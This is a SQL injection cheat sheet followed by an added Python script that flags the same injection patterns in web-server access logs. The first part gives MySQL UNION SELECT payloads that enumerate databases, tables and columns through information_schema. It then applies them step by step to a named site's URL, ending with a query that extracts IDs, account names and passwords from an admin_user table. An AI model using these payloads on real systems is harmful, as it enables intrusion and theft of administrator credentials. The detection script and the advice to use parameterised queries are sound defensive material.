Enumerate databases:
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables:
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns:
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Dumping this way, the admin_user table showed up at the 4th entry.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
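The three enumeration steps above (SCHEMATA, TABLES, COLUMNS, then a concat() of the target table) leave a recognisable shape in web-server access logs: a UNION SELECT against information_schema, with the comment filler /**/ standing in for spaces and hex literals standing in for quoted names. The Python below is an added detection example, not code from the original post. It runs over constructed access-log lines (placeholder path and a made-up schema name 0x746573745F6462 = "test_db"), normalises each request the way the payloads are written, flags the keyword combinations, and decodes any hex literals so an analyst can see which schema or table name was being enumerated. The function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post): one normal
# request and three shaped like the information_schema enumeration steps above,
# against a placeholder path and the made-up schema name 0x746573745F6462 ("test_db").
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /content.php?id=13240 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /content.php?id=-1/**/union/**/select/**/1,SCHEMA_NAME,3/**/from/**/information_schema.SCHEMATA/**/limit/**/1,1/* HTTP/1.1" 200 480',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /content.php?id=-1/**/union/**/select/**/1,TABLE_NAME,3/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x746573745F6462/**/limit/**/0,1/* HTTP/1.1" 200 476',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /content.php?id=-1%20union%20select%201,concat(0x7c,user,0x7c,pass,0x7c),3%20from%20users%20limit%200,1 HTTP/1.1" 200 470',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
UNION_SELECT_RE = re.compile(r"\bunion\b\s+(?:all\s+)?select\b")
INFO_SCHEMA_RE = re.compile(r"\binformation_schema\.(schemata|tables|columns)\b")
HEX_LITERAL_RE = re.compile(r"\b0x([0-9a-f]+)\b")
CONCAT_RE = re.compile(r"\bconcat\s*\(")


def normalize_query(uri):
    """URL-decode, turn /**/ comment filler into spaces, collapse whitespace, lower-case.

    This undoes the two evasions used in the payloads above: inline comments
    instead of spaces, and mixed case in keywords (From, Where).
    """
    s = unquote(uri)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def decode_hex_literals(normalized):
    """Decode 0x... literals so the analyst sees the schema/table name being probed."""
    out = []
    for h in HEX_LITERAL_RE.findall(normalized):
        if len(h) % 2:          # odd length cannot be a byte string
            continue
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            out.append("<non-ascii>")
    return out


def classify_request(uri):
    """Return the indicators present in one request URI (hypothetical helper)."""
    q = normalize_query(uri)
    findings = []
    if UNION_SELECT_RE.search(q):
        findings.append("union_select")
    m = INFO_SCHEMA_RE.search(q)
    if m:
        findings.append("information_schema." + m.group(1))
    if CONCAT_RE.search(q):
        findings.append("concat")
    return {"uri": uri, "findings": findings, "hex_decoded": decode_hex_literals(q)}


def scan_log_lines(lines):
    """Extract the request target from each log line and classify it."""
    results = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        results.append(classify_request(m.group(1)))
    return results


if __name__ == "__main__":
    for r in scan_log_lines(SAMPLE_LOG):
        if r["findings"]:
            print(r["findings"], r["hex_decoded"], r["uri"])
```

Run over the sample, the first line produces no findings, the SCHEMATA and TABLES probes are flagged as union_select plus the information_schema table they read, and the TABLES probe's hex literal decodes to test_db; the final line is flagged for union_select and concat, with the 0x7c separators decoding to "|". A sequence of such requests from one client, walking SCHEMATA then TABLES then COLUMNS and finally a concat() on a named table, is the signature to alert on; the underlying fix is parameterised queries on the id parameter.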